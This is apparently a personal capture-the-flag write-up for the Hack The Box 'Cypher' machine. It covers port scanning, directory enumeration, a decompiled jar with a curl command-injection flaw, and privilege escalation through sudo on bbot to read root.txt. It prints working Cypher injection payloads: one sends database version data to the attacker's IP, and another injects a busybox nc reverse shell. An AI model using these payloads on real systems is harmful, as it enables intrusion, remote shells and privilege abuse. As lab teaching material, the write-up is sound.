HTB | Cypher
machine - https://app.hackthebox.com/machines/Cypher
IP - 10.10.11.57
NMAP
└─$ nmap -sT -p- --min-rate 10000 10.10.11.57 -Pn -oA nmap_ports
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2025-03-02 16:51 IST
Warning: 10.10.11.57 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.57
Host is up (0.21s latency).
Not shown: 58936 closed tcp ports (conn-refused), 6596 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1337/tcp open waste
Nmap done: 1 IP address (1 host up) scanned in 53.16 seconds└─$ cat nmap_ports.nmap | awk '/^[0-9]+\\/tcp/ {gsub("/tcp",""); print $1}' | tr '\\n' ',' | sed 's/,$/\\n/'
22,80,1337└─$ nmap -sC -sV -p 22,80,1337 10.10.11.57 -Pn -oA nmap_ports_details
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2025-03-02 16:53 IST
Nmap scan report for 10.10.11.57
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 be:68:db:82:8e:63:32:45:54:46:b7:08:7b:3b:52:b0 (ECDSA)
|_ 256 e5:5b:34:f5:54:43:93:f8:7e:b6:69:4c:ac:d6:3d:23 (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to <http://cypher.htb/>
|_http-server-header: nginx/1.24.0 (Ubuntu)
1337/tcp open waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 185.86 seconds
Port 80
directory enumeration
└─$ dirsearch -u <http://cypher.htb/> -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/anurag/htb/Cypher/reports/http_cypher.htb/__25-03-02_17-02-14.txt
Target: <http://cypher.htb/>
[17:02:14] Starting:
[17:02:46] 200 - 5KB - /about
[17:02:46] 200 - 5KB - /about.html
[17:03:07] 307 - 0B - /api -> /api/docs
[17:03:07] 307 - 0B - /api/ -> <http://cypher.htb/api/api>
[17:03:26] 307 - 0B - /demo -> /login
[17:03:27] 307 - 0B - /demo/ -> <http://cypher.htb/api/demo>
[17:03:54] 200 - 4KB - /login
[17:03:54] 200 - 4KB - /login.html
[17:04:34] 301 - 178B - /testing -> <http://cypher.htb/testing/>
Task Completed /login
on /testing we found a jar file
Foothold/shell
Cypher Injection
Let’s download it and decompile the jar file using an online decompiler, and analysis the code
Upon decompiling, we find a file named "CustomFunctions.java". After analyzing it, we can that there is command injection
How the Code Works
Takes a URL as input and ensures it starts with
http://orhttps://.Constructs a shell command using
curlto fetch the HTTP status code:String[] command = new String[]{"/bin/sh", "-c", "curl -s -o /dev/null --connect-timeout 1 -w %{http_code} " + url};Executes the command using
Runtime.getRuntime().exec(command).Reads the status code from the process output and returns it.
on passing admin:admin on /login I got invalid credential with the following Burp response
Found this article for exploiting the cypher injection
using the below payload to confirm the cypher injection in the username parameter
' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM '<http://10.10.14.49/?version=>' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 // 
Since we get error, that means the cypher injection is possible
Let’s use the below payload to get the hit on our machine
' return h.value as a UNION CALL custom.getUrlStatusCode('<http://10.10.14.49:80>') YIELD statusCode AS a RETURN a;//We were able to get shell (for some reason it works with busybox, not normal nc)
' return h.value as a UNION CALL custom.getUrlStatusCode('<http://10.10.14.99:80>;busybox nc 10.10.14.99 1234 -e sh;#') YIELD statusCode AS a RETURN a;//
found cred for neo4j in bbot_preset.yml
The cred did not work for , Neo4j, but it worked for Graphasm
we have user.txt
Priv Esc
we have sudo write on /usr/local/bin/bbot
graphasm@cypher:~$ cat /usr/local/bin/bbot
#!/opt/pipx/venvs/bbot/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from bbot.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\\.pyw|\\.exe)?$', '', sys.argv[0])
sys.exit(main())we can view the content of root.txt by
sudo /usr/local/bin/bbot -cy /root/root.txt -d
-cy load [custom yara rules](<https://www.blacklanternsecurity.com/bbot/Stable/modules/custom_yara_rules/>)
-d is for debug
Last updated